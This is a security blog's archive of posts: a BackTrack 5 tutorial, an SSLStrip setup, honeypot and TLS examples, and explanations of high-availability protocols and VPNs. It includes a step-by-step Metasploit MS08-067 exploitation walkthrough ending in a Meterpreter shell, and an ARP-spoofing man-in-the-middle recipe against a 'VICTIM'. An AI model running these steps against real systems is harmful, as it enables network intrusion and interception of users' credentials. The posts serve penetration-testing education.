Category Archives: security

Back Track 5 r3 a BOx or a BOmb. The security suite.

Since it was started in 2006, Back Track has become one of the best security suites in the penetration testing market. Due to that fact, there has been a huge proliferation of this kind of software in the last few years.

In this article we are going to cover how a bundle of software can be as easy as pie, or a dangerous game that could get you into trouble. On one side, installation is pretty easy (even in a virtual machine, you can easily run a security distribution). On the other side, managing and mastering it is in a completely different league.

We have in front of us a Linux OS with more than 300 penetration tools.

This article will help you to open the box. What can you do with a box? Not so much, or maybe nothing. But with the content of the box you could probably do a lot of things, even more if we are talking about a big box with hundreds of boxes inside. I must tell you to be careful because, depending on the use, the content can be as bad as nitroglycerin. It also goes without saying that, in some countries, the use of these tools can be considered terrorism.

When used in the right way, we have a great security tool which can help in several different areas (wifi, forensics...). With the right knowledge of each area, the power multiplies 10 times.

If you use it wrongly, you can have serious problems. That said, it will be your own responsibility once you start BackTrack.

After you read this article, you will be able to run a security suite and use a couple of applications. My opinion is that the information displayed here is enough to get you hooked and leave you hungry for knowledge. I think so mainly because I will give you a few tips to get information from the system you want to audit 😉 and I say a small part because it is quite difficult to talk about all of the more than 300 tools that are part of Back Track. Within security, there are also different fields that we could talk about, and talk about a lot, by the way.

I still remember the time, several years ago, when I discovered this tool. It was Back Track 2 at that time. I was using a new Dell laptop with 2 GB RAM, a 1.6 GHz Intel processor and an NVIDIA graphics card. It took me at least 3 days to sniff a simple packet because of my wifi chipset version, and another extra day to inject traffic. I didn't have internet at home because I was living abroad, and I had to go to a local cybercafe.

Let's start from the beginning. The current version is BackTrack 5 r3. I recommend downloading the ISO image from http://www.backtrack-linux.org/. Since this is a modified Ubuntu version (Ubuntu 4.4.3, to be more accurate), you can run it even on a smartphone.

Once the iso is in your hands, you have 3 options:

  • Install it in your hard drive. Highly recommended for professionals.
  • Install it on a USB drive or DVD (with the proliferation of USB devices it does not make any sense, but it is a possibility) to run a live version. It is also a good option if you do not want to change anything on your computer. But I would recommend that, once you run your live image, you make your changes permanent on the USB; otherwise, the next time you run it you will have to change the settings again. And that is not much fun.
  • Virtualization. The best and quickest option to play with. This option lets you install, or even run the live ISO image, in a virtual machine. It is the easiest way to start using it. You could run a lot of virtual machines on a single PC, depending on the features and characteristics of your equipment. With a computer and a couple of virtualized machines you can play at protecting one box and attacking the other. It is fun if you are into it, and you could spend lots of hours 🙂

First steps:

After booting the system, you can see the following message:

Figure 1 – Boot

Press Enter and you will reach the main boot menu. There are 3 different modes:

-Stealth

-Forensics

-Text (this one is the default option)

Figure 2 – Back Track menu

The main objective of this article is to speak only about the first boot option, “Text mode”, so you can get to know it better. I will jump quickly into graphic mode, basically because that is the easiest way in most cases and because it is a friendlier environment. I must also say that to reach excellence in Back Track, you need to be fairly good in text mode and know it very well. That is the same as saying “if you want to run, you should learn to walk first”.

Following with the instructions, once you press “BackTrackText” the screen will show:

Figure 3 – Login

When the “bt login” appears, it means that you are already in Text mode. The following are the credentials to log into the system.

user root
password toor (the one used in the latest BackTrack distributions)

Figure 4 – Command line

Once you type the default credentials, you will see the prompt shown above. From here the race begins! You can start to play now. At this point, we have crossed the line. Everything is ready!

You can start applications in text mode (tcpdump, netcat, nmap...). Also, as in every Linux distribution, with Alt + function keys you can move to different terminals.

To run the graphical environment, just type:

root@bt:~# startx

Once you are in the main window, go to Applications > BackTrack. You will now see all the areas that BackTrack covers:

Figure 5 – Back Track Xwindow

From now on, it depends on preferences. As you can see in the previous image, there are different areas to explore:

  • Information Gathering
  • Vulnerability Assessment
  • Exploitation Tools
  • Privilege Escalation
  • Maintaining Access
  • Reverse Engineering
  • RFID Tools
  • Stress Testing
  • Forensics
  • Reporting Tools
  • Services
  • Miscellaneous

Like any good expert, before any attack you need to know your “victim”, right? I believe that it is sensible to start with the Information Gathering tools. You need to get as much information as possible to find the best attack vectors. Personally, one of my favorite tools for reconnaissance jobs is Maltego. The Paterva guys are doing a very good job in this area. With a graphical interface, they make it easy to start getting information from a simple domain record. With this tool you simplify your work, avoiding getting stuck in text mode and parsing output to draft the final report. It is quite complete, and there is even the possibility to add plugins.

Believe me, this tool is fantastic. Let me tell you that, as a security consultant, it helps a lot to use Maltego. To be honest, as a consultant, the whole suite is a mandatory tool to have. It is like an all-in-one. Needless to say, a good professional usually has every tool personalized, and this is also the case here. Back Track runs under a Linux distribution or, even better, it is a Linux distribution already modified for security experts. So, once you have the ultimate Back Track tool, you may start to tune it to fulfill your own needs.

You also have Wine installed by default to emulate any Windows application on a Linux machine.

Let's talk now about Maltego. I remember a previous version (version 2) in which you were not asked to log in as in this new one. This has probably been done to provide better features.

How can we use it then? Where should I start? Once you open it, the picture shown next (figure 6) is the first screen you will see:

Figure 6 – Maltego

The first option that you may check is Manage > Manage Transforms. This is an important one, the real engine that helps you establish the parameters of how Maltego will work later on. A good transform will lead you to a better result.

Figure 7 – Transform manager

You can create your own transforms, personalized to your needs, or you can modify the ones that are in the system by default. You also need to accept each transform disclaimer, unless you want to accept it every time you run a transform. You can sort them by Status and accept the ones in “disclaimer not accepted” status. After you fine-tune your transforms, you are ready to start using Maltego.

To view the information, you have Main View, Bubble View and Entity List View. By default, Main View is selected. The differences are in how data is represented (with icons in the main view, with bubbles in the bubble view, and as a list). The default view starts as in Figure 6. Let's see the options. On the left side, there are the objects which you can drag and drop into the Main View. On the right side you see some other windows that will be empty until you select an icon. Starting from the left and selecting “Domain”, for example, you already have the first piece of the game. I did a test with the default value, which is paterva.com. Of course, you can change it to whatever domain name you want, and do the same for each object. By clicking on it, or even passing the mouse over it, you get a detailed view and also a property view on the right side of the main window. With a single object, there is not much that we can do. Let's go on! Now right-click on the domain and choose “Run Transform” -> “All transforms”, and this is the result:

Figure 8 – Transformation finished

As you can see, there is a lot of “rubbish”. In this case, if you visit paterva.com, you'll notice that at the bottom of the website there are some social network icons, and that is why you see facebook, twitter, youtube... in your schema. The same goes for phones and some other objects. For that reason, discard all the icons that are not giving you any interesting information. You can then continue running transforms on each icon until you get the final picture.

When you click on “Running transforms”, this is what Maltego is doing in the “background” to draw the final picture.

Figure 9 – Transform output

The best idea is to check only the important transforms or, even better if you ask me, disable the ones not needed and create personalized ones. As I said before, the first click you should make after starting Maltego is Manage > Manage Transforms.

Another interesting tool that we can talk about is EtherApe. It is not under the BackTrack option in the main menu. You can find it in System Tools or in Internet. It is a graphical network monitor with 5 different capture modes (Token Ring, FDDI, Ethernet, IP and TCP). You can see the connections from your host, the connections to your host, or both ways. This is, in my opinion, an easy and light tool with just a few options, but very useful.

Figure 10 – EtherApe – Preferences

You will surely be surprised if you run this tool and then open your favorite website. It is as if it were alive. Every few seconds, a banner or another link in your browser creates a connection. I did a test with http://www.facebook.com. You can also see the IPs, traffic per node and traffic per protocol.

Figure 11 – EtherApe

An easy and quick example that you can try is typing the IP of your own router in your browser; you'll see that only one connection is created between you and the router. But if you type, for example, http://www.amazon.com, you will see the much larger number of connections that are created.

Let's assume that you are a security guy who needs to audit a “secured system”. The first action that you may take is to change your MAC address, because you do not want to be discovered, or because you already know the physical address of a machine and you want to obfuscate. The tool used for that purpose is the one that we are going to see next, macchanger.

“Macchanger”.

Figure 12 – Macchanger

As you can see in the previous screenshot of the help menu, this is an easy and useful tool, much like some of the previous ones. With a virtual machine, you could also do it but if you want to change too many times, it is worth it.

The last application which I will cover in this article is Metasploit. This application is an exploitation tool, so we will find it in the path below (see figure 13):

Figure 13 – Metasploit path

Metasploit is a powerful framework that can be used in different fields. It is like a Back Track inside another Back Track. I would like to start by mentioning that an important task to do before starting to play with it is to update the database. The real power of this tool is in the database, which is being continuously updated. Metasploit is “exploiting” vulnerabilities, and if you don't have this database up to date, it is like an old anti-virus that has not been updated for 3 months. Maybe you intend to exploit a vulnerability that is already in the database and you do not want to update, but this is not usual, because vendors and software developers are also fixing the problems as soon as possible. There are some cases in which the time from day “0” to the moment the problem is patched is longer than expected.

To understand it better, let's think about a scenario: you are a system administrator for an important company and your web server is affected by an XSS. Due to this vulnerability, a user could get a copy of your user database, compromising the privacy of the employees. As a good administrator, you need to test that your application is not affected by the dangerous bug or, if it is affected, try to fix the problem. The most important thing for you is the system that you are administering. We need to know our infrastructure (software and hardware), and also the behavior of a specific pattern.

Some concepts that should be familiar to you when you are using Metasploit are payload and exploit. A payload is a piece of software which allows you to take control of the computer that is affected by the exploit being used. The best-known payload is Meterpreter (we will see it in the example later on). An exploit is a program or piece of software designed to break or crash into a system through a known vulnerability.

What this software is basically doing is checking a database of all kinds of bugs for different platforms, software... (that's why it is so important to update first). You can load a bug for a specific application and, once it is loaded, you can attack the application with that tool. Let's see it with an example:

1st – Update the database. As I mentioned before, this is an important step. Looking at figure 13, we can see that there is an icon to update Metasploit. Click on it and prepare yourself a good coffee while you wait. It will take time.

Figure 14 – Updating Metasploit

2nd – Start Metasploit. You will get a random image and at the end you will see: version, exploits, payloads….

Figure 15 – msf console

3rd – Find a bug in Metasploit and try to use it. Just type the “search” command plus a string to search for. In the example below we are searching for ms08 (command: “search ms08”).

Figure 16 – Searching in modules

4th – Load the module. Once you have defined the exploit, type: “use” + module.

Figure 17 – Module loaded

Once you are in ms08_067_netapi module, you need to investigate which options you can  type.

Now, you can define your parameters with the “set” command.

  • set rhost 192.168.1.61 (this is the ip of the remote host)
  • set lhost 192.168.1.59 (our local ip)

5th – Once it is loaded run an attack to exploit the bug. When we have the parameters configured, we will type the “exploit” command and WE ARE INSIDE!!

Figure 18 – Exploiting

Meterpreter is the payload. Invoking help, we will already see the commands to execute in the remote host.

Figure 19 – Shell in remote host

This is only a module and you could load hundreds of modules. We also could find hundreds of exploits.

Just to summarize, the commands used in this article for Metasploit are:

  • ./msfpro -> Start the program
  • search + “string” -> Search the big database for a string
  • use + module -> Load the module
  • show options -> Show the options of the module that you previously loaded
  • set + option -> Define the option values
  • exploit -> Start the exploit

To cover in depth all the tools included in this distribution, I would have to spend some months of my life, or even some years.

Just to summarize, we are standing in front of a Swiss army knife (a big one, by the way!).

I have given you the main steps to use one of the best security suites in the world. Now it is up to you. With that number of tools in Back Track, you can choose which one is your strong point, try to use it and do your best. Or you could even try to investigate other areas.

If you are an expert in networks, you can use BT. If you are a programmer, you can use BT. If you are a database expert, you can use BT. If you are a security specialist, you can use BT. Even if you are not an IT expert you can also use it, to get information about any place, person or item 😉

About Eduardo Cuthbert:
I started in networking and security in 2004. Ever since I discovered the field of Security I have been passionate about it.

Having always lived and worked in a medium size city in Spain, I decided to try and take my chances abroad. Knowing that in other countries I could develop and research, I left and found a job in Switzerland, where I am living and working currently.

I have always worked in those two fields and I consider myself a committed and focused person, so researching and learning about new developments is something essential to me. That’s why I have always looked for better ways of improving.

Through all my career I got several certifications, such as CCNP and CCSP.

I am also a cycling enthusiast.

Text: Eduardo Cuthbert González

Proof reader: Desirée Suarez González

Security¿?

I was thinking today about security. On the way to work I usually read a book that talks about it. My mind is becoming paranoid. Before, I was working at a remote site far away from the crowded city, but now the situation is different. I am in a big city. When I go to work I see a lot of people with laptops, smartphones, tablets... and I can only think about security.

Are all of those devices really secured? I'd like to think that, at least, the professional people have a device 100% secured. When I say secured... at least have an antivirus and a password to unlock the device, or a password and some kind of encryption.

I believe that the other devices, those of teenagers and people who are not using the technology for work, are not so protected. I saw some people unlocking the screen with a code number (that is good) and also with a pattern code, which is not so good (basically because if you look at the telephone against the light you can see the pattern).

With a simple test, you could figure out how many devices are running with an open window; when I say that, I'm referring to Bluetooth or wireless being active. I know that most of them prefer to keep connections active because they save 5 seconds on activation (aaahhhhh!!!).

I'm remembering my time as an administrator:

Me: – (looking away from the keyboard), please type your password.

User: – I wrote my user and pass for you on a piece of paper. I'm going to put some order here in the office.

Me: …..LOL!

Back to mobile devices, there are many kinds of attacks on smartphones that could be used with bad intentions. There are tons of stupid apps that people download and don't update. These kinds of apps are a good starting point for an exploit.

Just some security advices:

  1. Put a password on your device (laptop, tablet, smartphone) to unlock it. You could forget it in a public place and anyone could snoop through your personal data.
  2. Don't save passwords. If someone gets access to your device, he could spend some time on eBay with your account.
  3. If you have your passwords there, use software to encrypt the password database.
  4. Don't use weak passwords like... “123456”

When you go to the bank machine, you usually hide the keypad to avoid watchers. In the same way, when you unlock your device or read an email, try to do the same.

A good idea is to use polarised covers.

:))

Back Track 4 R2

One of the best pen-test, forensic and, in general, security tools is Back Track.

Chronology:

* February 5, 2006: BackTrack v.1.0 Beta
* May 26, 2006: The BackTrack project released its first non-beta version (1.0).
* October 13, 2006: BackTrack 2 first public beta released.
* November 19, 2006: BackTrack 2 second public beta released.
* March 6, 2007: BackTrack 2 final released.
* December 17, 2007: BackTrack 3 first beta release.
* June 19, 2008: BackTrack 3 final released.
* February 11, 2009: BackTrack 4 first beta release. (It’s now based on Debian)
* June 19, 2009: BackTrack 4 pre-final release.
* January 9, 2010: BackTrack 4 final release.
* May 8, 2010: BackTrack 4 R1 release
* November 22, 2010: BackTrack 4 R2 release

My first contact with this tool was in 2007, just because I was testing (I love testing new software, hardware... ;) ) different security tools. I remember that the first problem I had was with the wifi card. My wireless chip was not supported in version 2. Thanks to the new version being almost ready... I could play with my laptop 😉 . It was useful at that moment.

What’s new in R2:
* Kernel 2.6.35.8 – *Much* improved mac80211 stack.
* USB 3.0 support.
* New wireless cards supported.
* All wireless Injection patches applied, maximum support for wireless attacks.
* Even *faster* desktop environment.
* Revamped Fluxbox environment for the KDE challenged.
* Metasploit rebuilt from scratch, MySQL db_drivers working out of the box.
* Updated old packages, added new ones, and removed obsolete ones.
* New BackTrack Wiki with better documentation and support.

Back Track 4 R1

New BackTrack 4 revision 1 is available to download.

New in this version:

* New Kernel 2.6.34 to improve hardware compatibility and performance.
* Update all tools
* New tool called “dragon”, which allows the user to modify BackTrack options from CML
* Added the option to replace the KDE environment with Fluxbox, offering a faster and more fluid environment.
* Implemented driver rt28xx for Alfa AWUS050NH cards.
* If you download VMware version, VMware tools are integrated.

This is the final version of BackTrack 4 R1.
Please download it and test it!!!

Direct Downloads:

ISO Version

http://www.backtrack-linux.org/download.php?fname=bt4r1

VMware version

http://www.backtrack-linux.org/download.php?fname=bt4r1vm

Torrent Downloads:

ISO Version

http://www.offensive-security.com/bt4-r1.iso.torrent

VMware version

http://www.offensive-security.com/bt4-r1-vm.tar.bz2.torrent

“Secure” Socket Layer (SSL)

Are you really sure that SSL connections are strong? I mean, that nobody can intercept your traffic, your passwords or even your bank account number? SSL is one of the world’s most important VPN encryption protocols.

There is a tool (SSL strip) whose author claims to have used it to steal data from the most important and “safe” websites. This man is Moxie, a recognized security consultant.

Configuring SSL-Strip

1st – Configure IP forwarding

echo 1 > /proc/sys/net/ipv4/ip_forward

2nd – Perform a Man-in-the-middle ARP attack

arpspoof -i eth0 -t VICTIM

3rd – Redirect traffic through iptables

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 8080

4th – Start SSLStrip in used port

python sslstrip.py -w archivo

Moxie’s website: http://www.thoughtcrime.org

Honeypots

A honeypot is software or a computer that simulates a vulnerable system to attract attackers. It is candy for hackers or people who want to play on the illegal side. This kind of “security system” (SS from now on) is used to learn attack methods, possible system failures and solutions to those failures. I say SS because, knowing different patterns, you can shield your infrastructure to prevent this type of attack.

A honeypot is used to distract an attacker by making a system more attractive. For example, a computer called “server” is more appealing than one called “computer”. A file called “passwords” is more attractive than one called “images”. These are two examples out of thousands.

A honeypot is then used to monitor the network. When an attacker is trying to crack your system, you have an opportunity to learn more about the attacker.

For all of the above, a honeypot is a prevention and detection system.

Kinds of honeypots:

Depending on function:

Production: Only captures information.

Research: Captures extensive information and is used by research, military or government organizations.

Depending on interaction with the attacker:

Low interaction: Emulates services. The attacker thinks he is cracking a system, but it is software that is emulating the service.

High interaction: The attacker interacts with it fully. Everything is real.

In the beginning, these honeypots were in most cases very expensive physical machines. Nowadays a honeypot can be a virtual machine in a virtual network with a virtual IP 🙂

I will test this kind of software and post comments in the future.
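A minimal sketch of the low-interaction kind described above, added here as an example and not taken from any honeypot product: it emulates only the login dialogue of an FTP-like service, never grants access, and records what the client tried. The banner text, the port 2121 and all function names are assumptions made for the illustration.

```python
import json
import socket
import threading
import time

BANNER = b"220 files-srv FTP server ready\r\n"  # constructed lure banner


def handle_client(conn, peer, log, max_lines=10):
    """Emulate just enough of an FTP login to record what the client tries.

    No command is ever executed and no login ever succeeds: every PASS gets
    a 530 reply. `log` is any callable that receives the finished record.
    """
    record = {"peer": peer, "ts": time.time(), "user": None,
              "password": None, "commands": []}
    conn.settimeout(10)  # an idle client must not hold the thread forever
    try:
        with conn, conn.makefile("rb") as lines:
            conn.sendall(BANNER)
            for _attempt in range(max_lines):   # cap the session length
                raw = lines.readline(512)       # cap the line length
                if not raw:
                    break
                verb, _sep, arg = raw.decode("latin-1").strip().partition(" ")
                verb = verb.upper()
                record["commands"].append(verb)
                if verb == "USER":
                    record["user"] = arg
                    conn.sendall(b"331 Password required\r\n")
                elif verb == "PASS":
                    record["password"] = arg
                    conn.sendall(b"530 Login incorrect\r\n")
                elif verb == "QUIT":
                    conn.sendall(b"221 Goodbye\r\n")
                    break
                else:
                    conn.sendall(b"530 Please login with USER and PASS\r\n")
    except OSError:  # timeouts and resets simply end the session
        pass
    log(record)
    return record


def serve(host="127.0.0.1", port=2121):
    """Accept connections and log each session as one JSON line on stdout."""
    def emit(record):
        print(json.dumps(record), flush=True)

    with socket.create_server((host, port)) as srv:
        while True:
            conn, addr = srv.accept()
            threading.Thread(target=handle_client,
                             args=(conn, f"{addr[0]}:{addr[1]}", emit),
                             daemon=True).start()


if __name__ == "__main__":
    serve()
```

Each JSON line gives the peer address, the attempted user name and password, and the sequence of commands, which is the "know more about the attacker" part of the description.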

High availability

I am passionate about security. First I would like to think about the concept.

What does “high availability” mean?

For example:

You are responsible for a small network and you have a spare server, router, switch and some computers. This cannot be considered high availability because it is not efficient. It would be high availability if you had two routers configured so that, in case one breaks, all traffic is routed by the other one. The administrator should receive an alarm and the broken appliance should be replaced. This can be a “basic” scenario. It is the same for servers and switches.

Best scenario could be:

*Two different internet providers.

*A pair of good routers each one with redundant power and configured with HSRP, VRRP or GLBP protocols.

*A cluster server environment to prevent a failure in the system.

*All devices should be connected to a separate power line.

*A UPS should protect the core of the company.

If, finally, all of the above can be duplicated in another office... it means that the information that you are handling is toooooo important 😉

I do not know if I have skipped any concept.

This is the theory, but it depends on the needs of the company. If the company can tolerate an hour or a day of lost service, then all these measures are not necessary. However, if the company sells articles on a website, each minute is important because the service is not good for the customer.

There are other extreme cases. I read a whitepaper in which the author was talking about the systems used by military forces in aircraft. The systems used to control these jets are the best example of redundancy. They use 3 different systems with 3 different architectures and 3 different operating systems. He did not talk about power, but I think that is redundant too 😉

Now let’s start to talk about redundant protocols.

Hot Standby Router Protocol (HSRP). Provides default gateway redundancy using one active and one standby router. That means one router carries all the load and, in case it fails, the standby router becomes the active router. When the service is re-established, it goes back to being the standby router as before. HSRP sends its hello messages to the multicast address 224.0.0.2 using UDP port 1985, to other HSRP-enabled routers, defining priority between the routers. The primary router with the highest configured priority will act as a virtual router with a pre-defined gateway IP and will respond to ARP requests from machines connected to the LAN with the MAC address 0000.0c07.acXX, where XX is the group ID in hex. If the primary router should fail, the router with the next-highest priority takes over the gateway IP and answers ARP requests with the same MAC address, thus achieving transparent default gateway fail-over.

HSRP and VRRP are not routing protocols as they do not advertise IP routes or affect the routing table in any way.

HSRP and VRRP on some routers have the ability to trigger a failover if one or more interfaces on the router go down. This can be useful for dual branch routers each with a single serial link back to the head end. If the serial link of the primary router goes down, you would want the backup router to take over the primary functionality and thus retain connectivity to the head end.

Virtual Router Redundancy Protocol (VRRP). An open-standard alternative to Cisco’s HSRP, providing the same functionality. It is designed to increase the availability of the default gateway servicing hosts on the same subnet. This increased reliability is achieved by advertising a “virtual router” (an abstract representation of master and backup routers acting as a group) as a default gateway to the host(s) instead of one physical router. Two or more physical routers are then configured to stand for the virtual router, with only one doing the actual routing at any given time. If the current physical router that is routing the data on behalf of the virtual router fails, an arrangement is made for another physical router to automatically replace it. The physical router that is currently forwarding data on behalf of the virtual router is called the master router. Physical routers standing by to take over from the master router in case something goes wrong are called backup routers.

A virtual router must use 00-00-5E-00-01-XX as its Media Access Control (MAC) address. The last byte of the address (XX) is the Virtual Router IDentifier (VRID), which is different for each virtual router in the network. This address is used by only one physical router at a time, and it will reply with this MAC address when an ARP request is sent for the virtual router’s IP address. Physical routers within the virtual router must communicate within themselves using packets with multicast IP address 224.0.0.18 and IP protocol number 112.

Routers have a priority of between 1-255 and the router with the highest priority will become the master. When a planned withdrawal of a master router is to take place, its priority can be lowered which means a backup router will pre-empt the master router status rather than having to wait for the hold time to expire. This reduces the black hole period.

Gateway Load Balancing Protocol (GLBP). Supports arbitrary load balancing in addition to redundancy across gateways. It is a Cisco proprietary protocol that attempts to overcome the limitations of existing redundant router protocols by adding basic load balancing functionality.

In addition to being able to set priorities on different gateway routers, GLBP also allows a weighting parameter to be set. Based on this weighting (compared to others in the same virtual router group), ARP requests will be answered with MAC addresses pointing to different routers. Thus, load balancing is not based on traffic load, but rather on the number of hosts that will use each gateway router. By default GLBP load balances in round-robin fashion.

GLBP elects one AVG (Active Virtual Gateway) for each group. Other group members act as backup in case of AVG failure. In case there are more than two members, second best AVG is placed in the Standby state and all other members are placed in the Listening state. This is monitored using hello and holdtime timers, which are 3 and 10 seconds by default. The elected AVG then assigns a virtual MAC address to each member of the GLBP group, including itself, thus enabling AVFs (Active Virtual Forwarders). Each AVF assumes responsibility for forwarding packets sent to its virtual MAC address. There could be up to four active AVFs at the same time.

By default, GLBP routers use the local multicast address 224.0.0.102 to send hello packets to their peers every 3 seconds over UDP 3222 (source and destination).

VPNs

There are different VPN (Virtual Private Network) protocols. The most common are PPTP, L2TP, IPSec and TLS.

PPTP

This protocol was developed by Microsoft in conjunction with other technology companies. It is the one most widely supported by Microsoft clients. PPTP is an extension of PPP and for that reason uses the same types of authentication (PAP, SPAP, CHAP, MS-CHAP, EAP). The big problem with this protocol is that it cannot provide encryption. Microsoft has resolved that issue by using the protocol in conjunction with MPPE (Microsoft Point-to-Point Encryption) to provide a secure VPN.

On most Microsoft operating systems it can be deployed without installing any client software, and it is available for Linux and some Mac OS versions. PPTP is supported by Cisco PIX, SonicWall and most firewall appliances.

L2TP

The acronym stands for Layer 2 Tunneling Protocol. This protocol was developed by Microsoft in collaboration with Cisco, combining features of PPTP with those of Cisco’s proprietary Layer 2 Forwarding (L2F) protocol. It can be used on non-IP networks such as ATM, frame relay and X.25. It is supported by major firewall products such as ISA Server, CheckPoint and Cisco PIX.

IP Security (IPSec) and its Encapsulating Security Payload (ESP) protocol provide encryption for L2TP tunnels. It requires the use of digital certificates. User authentication is performed via the same PPP authentication mechanisms as PPTP, but L2TP also provides computer authentication.

L2TP provides data integrity (protection against modification of the data between the time it left the sender and the time it reached the recipient), authentication of origin (confirmation that the user who claims to have sent the data really did), and replay protection (keeps a hacker from being able to capture data that is sent, such as credentials, and then “replay” it to “trick” the server). On the other hand, the overhead involved in providing this extra security can result in slightly slower performance than PPTP.

This protocol does not provide any encryption or confidentiality by itself.

IPSec

As its name implies, it is an IP security protocol. It encrypts and authenticates each packet. It operates at layer 3 (network) of the OSI model.

This is one of the most preferred VPN protocols for site-to-site connections. Many hardware VPN appliances use an implementation of IPSec (Cisco VPN Concentrators and PIX, SonicWall, Watchguard…).

It requires that the VPN client computers have client software installed. It is useful for users who are not in the office (remote users). If it is used in tunnel mode, it secures packets transmitted between two gateways. This is normal practice in VPNs between branch offices.

IPSec is implemented by a group of cryptographic protocols to ensure flow control and mutual authentication, and to establish cryptographic parameters. The IP security architecture uses SAs (Security Associations) to set up security functions like IKE and IKEv2 (Internet Key Exchange) or KINK (Kerberized Internet Negotiation of Keys).

There are two different modes: Transport and Tunnel.

Transport mode. Only the payload (data sent) is encrypted or authenticated.

Tunnel mode. The complete packet is encrypted or authenticated.

TLS

Transport Layer Security. It is the successor of SSL (Secure Socket Layer). It is a protocol for which you do not need additional software installed on your computer. It uses web browsers as the client application. TLS provides endpoint authentication using cryptography. TLS authentication is unilateral, which means the server is authenticated but not vice versa.

When a TLS or SSL connection is established, the client and server negotiate a CipherSuite, exchanging CipherSuite codes in the client hello and server hello messages, which specifies a combination of cryptographic algorithms to be used for the connection. The key exchange and authentication algorithms are typically public key algorithms or, as in TLS-PSK, preshared keys could be used. The message authentication codes are made up from cryptographic hash functions using the HMAC construction for TLS, and a non-standard pseudorandom function for SSL.
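The CipherSuite codes mentioned above travel as 2-byte values inside the client hello. The following added example (not part of the original post) extracts the offered codes from a ClientHello record and reports the ones a defender would not want negotiated; the four codes are real IANA registry values, while the weak-suite policy, the function names and the sample record are assumptions of this illustration.

```python
import struct

# A few registered CipherSuite codes; WEAK is this example's own policy.
SUITES = {
    0x0005: "TLS_RSA_WITH_RC4_128_SHA",
    0x000A: "TLS_RSA_WITH_3DES_EDE_CBC_SHA",
    0x002F: "TLS_RSA_WITH_AES_128_CBC_SHA",
    0xC02F: "TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256",
}
WEAK = {0x0005, 0x000A}

def offered_suites(record: bytes) -> list:
    """Return the CipherSuite codes offered in a TLS ClientHello record."""
    if len(record) < 5 or record[0] != 0x16:
        raise ValueError("not a TLS handshake record")
    (rec_len,) = struct.unpack("!H", record[3:5])
    hs = record[5:5 + rec_len]
    if len(hs) < 39 or hs[0] != 0x01:
        raise ValueError("not a ClientHello")
    pos = 4 + 2 + 32          # handshake header, client_version, random
    pos += 1 + hs[pos]        # session_id length byte plus session_id
    if len(hs) < pos + 2:
        raise ValueError("truncated ClientHello")
    (n,) = struct.unpack("!H", hs[pos:pos + 2])
    raw = hs[pos + 2:pos + 2 + n]
    if n % 2 or len(raw) != n:
        raise ValueError("truncated cipher_suites list")
    return [code for (code,) in struct.iter_unpack("!H", raw)]

def weak_offers(record: bytes) -> list:
    """Names of the offered suites that the WEAK policy rejects."""
    return [SUITES.get(c, f"0x{c:04X}") for c in offered_suites(record) if c in WEAK]

def sample_client_hello(codes: list) -> bytes:
    """Constructed ClientHello: zero random, empty session_id, no extensions."""
    suites = b"".join(struct.pack("!H", c) for c in codes)
    body = (b"\x03\x03" + bytes(32) + b"\x00" +
            struct.pack("!H", len(suites)) + suites + b"\x01\x00")
    hs = b"\x01" + len(body).to_bytes(3, "big") + body
    return b"\x16\x03\x01" + struct.pack("!H", len(hs)) + hs
```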

I will explain IPSec and TLS protocols in separate posts.

Maltego, PenTest tool

As I said days ago, “I will test Back Track 4”. So, I did it!

Let me tell you that I have only been testing the Maltego tool. Oh my Goooooood!!!!! It’s amazing. This is a forensic and pen-test tool. If you want to check a domain, website or whatever in a network, this tool can help you. It is graphical and you can see the evolution easily.

For example: you want to know, from outside, which information about your company people can get. This is an example:

As you can see, there is a lot of data that maybe you don’t want to be available from the Internet. This is only the start 😦 because Maltego can get the following information:

* E-mail addresses

* IP addresses, even if you have more than one

* Net block

* Phone number (in case it is placed on the website or in another kind of document accessed from outside)

* MX record

* Location

* NX record

* Domain (you know an IP address and you want to know all domains behind this IP)

* Documents

* People (social networks)

There is a lot of info… so, if you think that your network is safe and that people can only see your website… check this tool first 🙂

This is the user guide: http://ctas.paterva.com/view/Userguide

Once you have tested it, you can draw your own conclusions.

Recommended 100%!!

Certifications

I’m going to speak about my certification path.

I’m currently a CCSP (Cisco Certified Security Professional). To achieve this certification, I studied for around a year. I was working in a small company configuring and installing routers, switches and other kinds of network devices. I started by studying the basic Cisco certification, CCNA (Cisco Certified Network Associate). After that, I thought: “Which field would you like to study?” At that moment, I was starting to get into security. Then I chose CCSP, because the other path, CCNP (Cisco Certified Network Professional), is related to networks and it didn’t interest me.

Studying for this certification, I discovered my passion: SECURITY SYSTEMS. First, let me explain that “security” covers a lot of fields, and if you really love it… you should choose your path. In my case, Network Security Systems. That means routers, switches, firewalls, IPS, IDS, sniffers, scanners…

Some people get this certification and then think: “This is the end of my path; from now on, I’m a security expert”. I’m sorry, but that is not true. This is a part of your race. This can be the start. In IT, you need to study every year if you want to stay up to date.

I’m currently studying for CCNP (Cisco Certified Network Professional) and I think that in no more than 2 months I will get it! 😉

Cisco is not the only way, but in my case it was my start. In my opinion, if you want to be a Security Expert, you should try:

* CISSP Certified Information Systems Security Professional

* CISA Certified Information Security Auditor

One of these is the best path because it is not focused on one technology, like Cisco, Juniper or another vendor.

There are more certifications, but they are not so technical.

Now it is your decision!